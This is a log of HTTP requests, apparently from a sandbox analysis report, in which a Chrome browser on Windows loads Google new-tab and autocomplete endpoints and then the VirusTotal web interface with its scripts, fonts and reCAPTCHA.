Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCOvUygEI/IPLAQiVocsBCIWgzQEI3L3NAQjpxc0BCJLKzQEIucrNAQis0c0BCInTzQEI29PNAQj2080BCNLWzQEIp9jNAQjp2M0BCPnA1BUYwcvMARi50s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=7&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCOvUygEI/IPLAQiVocsBCIWgzQEI3L3NAQjpxc0BCJLKzQEIucrNAQis0c0BCInTzQEI29PNAQj2080BCNLWzQEIp9jNAQjp2M0BCPnA1BUYwcvMARi50s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=520=cnb8efMP02xMqSotujjSuBTLkx23sXSxAMeRP3UIq8LeVUtdp-IsbiuijOXpDO8IVD8s6Emp2T_-Wlmu1dHHlvQEOcY4c7ZsUbrc93eKyTev8Fth5kyPE6Gn9lc6hd_sTD0pURQ8Y2gsAg3jWj_gSwJa72Qwr5M6BJEegP74DLHb4gvNrl3MH34OV8FdeD3N
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCOvUygEI/IPLAQiVocsBCIWgzQEI3L3NAQjpxc0BCJLKzQEIucrNAQis0c0BCInTzQEI29PNAQj2080BCNLWzQEIp9jNAQjp2M0BCPnA1BUYwcvMARi50s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=520=LnnDfJWmvTG267wH4QJvcul0IvKrwvyw8MPaq-l42CpCu579z6rv5ud_KaMqYOWEOfjIq5nSoUfqgvvLgqEHZBEBiJZ6lvtm5TPnh_pa0ln8SYsnSFEEdakc_KkJFoEJaks0CuZ4gj73OFTbCo49e7sbQf7hCVR1MzbU_H44un5ABG7i19FQ2rYz87-tGIDutxVRvdgu
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=7&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCOvUygEI/IPLAQiVocsBCIWgzQEI3L3NAQjpxc0BCJLKzQEIucrNAQis0c0BCInTzQEI29PNAQj2080BCNLWzQEIp9jNAQjp2M0BCPnA1BUYwcvMARi50s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=520=LnnDfJWmvTG267wH4QJvcul0IvKrwvyw8MPaq-l42CpCu579z6rv5ud_KaMqYOWEOfjIq5nSoUfqgvvLgqEHZBEBiJZ6lvtm5TPnh_pa0ln8SYsnSFEEdakc_KkJFoEJaks0CuZ4gj73OFTbCo49e7sbQf7hCVR1MzbU_H44un5ABG7i19FQ2rYz87-tGIDutxVRvdgu
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=virus&oit=1&cp=5&pgcl=7&gs_rn=42&psi=g_cpjZ4Qvjy5Pv9Y&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCOvUygEI/IPLAQiVocsBCIWgzQEI3L3NAQjpxc0BCJLKzQEIucrNAQis0c0BCInTzQEI29PNAQj2080BCNLWzQEIp9jNAQjp2M0BCPnA1BUYwcvMARi50s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=520=LnnDfJWmvTG267wH4QJvcul0IvKrwvyw8MPaq-l42CpCu579z6rv5ud_KaMqYOWEOfjIq5nSoUfqgvvLgqEHZBEBiJZ6lvtm5TPnh_pa0ln8SYsnSFEEdakc_KkJFoEJaks0CuZ4gj73OFTbCo49e7sbQf7hCVR1MzbU_H44un5ABG7i19FQ2rYz87-tGIDutxVRvdgu
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=virust&oit=1&cp=6&pgcl=7&gs_rn=42&psi=g_cpjZ4Qvjy5Pv9Y&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCOvUygEI/IPLAQiVocsBCIWgzQEI3L3NAQjpxc0BCJLKzQEIucrNAQis0c0BCInTzQEI29PNAQj2080BCNLWzQEIp9jNAQjp2M0BCPnA1BUYwcvMARi50s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=520=LnnDfJWmvTG267wH4QJvcul0IvKrwvyw8MPaq-l42CpCu579z6rv5ud_KaMqYOWEOfjIq5nSoUfqgvvLgqEHZBEBiJZ6lvtm5TPnh_pa0ln8SYsnSFEEdakc_KkJFoEJaks0CuZ4gj73OFTbCo49e7sbQf7hCVR1MzbU_H44un5ABG7i19FQ2rYz87-tGIDutxVRvdgu
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=virusto&oit=1&cp=7&pgcl=7&gs_rn=42&psi=g_cpjZ4Qvjy5Pv9Y&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCOvUygEI/IPLAQiVocsBCIWgzQEI3L3NAQjpxc0BCJLKzQEIucrNAQis0c0BCInTzQEI29PNAQj2080BCNLWzQEIp9jNAQjp2M0BCPnA1BUYwcvMARi50s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=520=LnnDfJWmvTG267wH4QJvcul0IvKrwvyw8MPaq-l42CpCu579z6rv5ud_KaMqYOWEOfjIq5nSoUfqgvvLgqEHZBEBiJZ6lvtm5TPnh_pa0ln8SYsnSFEEdakc_KkJFoEJaks0CuZ4gj73OFTbCo49e7sbQf7hCVR1MzbU_H44un5ABG7i19FQ2rYz87-tGIDutxVRvdgu
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=virustot&oit=1&cp=8&pgcl=7&gs_rn=42&psi=g_cpjZ4Qvjy5Pv9Y&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCOvUygEI/IPLAQiVocsBCIWgzQEI3L3NAQjpxc0BCJLKzQEIucrNAQis0c0BCInTzQEI29PNAQj2080BCNLWzQEIp9jNAQjp2M0BCPnA1BUYwcvMARi50s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=520=LnnDfJWmvTG267wH4QJvcul0IvKrwvyw8MPaq-l42CpCu579z6rv5ud_KaMqYOWEOfjIq5nSoUfqgvvLgqEHZBEBiJZ6lvtm5TPnh_pa0ln8SYsnSFEEdakc_KkJFoEJaks0CuZ4gj73OFTbCo49e7sbQf7hCVR1MzbU_H44un5ABG7i19FQ2rYz87-tGIDutxVRvdgu
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=virustota&oit=1&cp=9&pgcl=7&gs_rn=42&psi=g_cpjZ4Qvjy5Pv9Y&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCOvUygEI/IPLAQiVocsBCIWgzQEI3L3NAQjpxc0BCJLKzQEIucrNAQis0c0BCInTzQEI29PNAQj2080BCNLWzQEIp9jNAQjp2M0BCPnA1BUYwcvMARi50s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=520=LnnDfJWmvTG267wH4QJvcul0IvKrwvyw8MPaq-l42CpCu579z6rv5ud_KaMqYOWEOfjIq5nSoUfqgvvLgqEHZBEBiJZ6lvtm5TPnh_pa0ln8SYsnSFEEdakc_KkJFoEJaks0CuZ4gj73OFTbCo49e7sbQf7hCVR1MzbU_H44un5ABG7i19FQ2rYz87-tGIDutxVRvdgu
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /gui/ HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /gui/main.88da91eb4efdde76ebe0.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /recaptcha/enterprise.js HTTP/1.1Host: www.recaptcha.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /recaptcha/enterprise.js HTTP/1.1Host: www.recaptcha.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /gui/main.88da91eb4efdde76ebe0.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959485.0.0.0; _ga=GA1.1.230491043.1736959486
Source: global traffic	HTTP traffic detected: GET /ui/user_notifications HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x334x1X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTAzODI3MDAwNjItWkc5dWRDQmlaU0JsZG1scy0xNzM2OTU5NDg4LjUwNw==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.230491043.1736959486; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959488.0.0.0
Source: global traffic	HTTP traffic detected: GET /ui/cookie_disclaimer HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x334x1X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTEzMjA1MDA1NDUtWkc5dWRDQmlaU0JsZG1scy0xNzM2OTU5NDg4LjUxOQ==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.230491043.1736959486; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959488.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/stackdriver-errors.3069a6025a2308368f46.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959485.0.0.0; _ga=GA1.1.230491043.1736959486
Source: global traffic	HTTP traffic detected: GET /recaptcha/api.js?render=explicit HTTP/1.1Host: recaptcha.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /gui/2121f4aabac6fbe523ec.woff2 HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.virustotal.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.virustotal.com/gui/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.230491043.1736959486; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959489.0.0.0
Source: global traffic	HTTP traffic detected: GET /ui/cookie_disclaimer HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.230491043.1736959486; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959489.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/stackdriver-errors.3069a6025a2308368f46.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.230491043.1736959486; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959489.0.0.0
Source: global traffic	HTTP traffic detected: GET /ui/user_notifications HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.230491043.1736959486; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959489.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/1402accbefdec6a25762.woff2 HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.virustotal.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.virustotal.com/gui/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.230491043.1736959486; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959489.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/ee990a93df71bfdfb3b5.woff2 HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.virustotal.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.virustotal.com/gui/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.230491043.1736959486; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959489.0.0.0
Source: global traffic	HTTP traffic detected: GET /recaptcha/api.js?render=explicit HTTP/1.1Host: recaptcha.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /gui/5978.8367bb052a47f57e9d55.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.230491043.1736959486; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959489.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/88220.73f555a4c45fa4d35b05.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.230491043.1736959486; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959489.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/vt-ui-shell-extra-deps.9672388f5abc8bb6a9e0.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.230491043.1736959486; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959489.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/5978.8367bb052a47f57e9d55.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.230491043.1736959486; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959489.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/88220.73f555a4c45fa4d35b05.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.230491043.1736959486; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959489.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/25076.be47e378edc0f5eb13be.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.230491043.1736959486; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959489.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/vt-ui-shell-extra-deps.9672388f5abc8bb6a9e0.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.230491043.1736959486; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959489.0.0.0
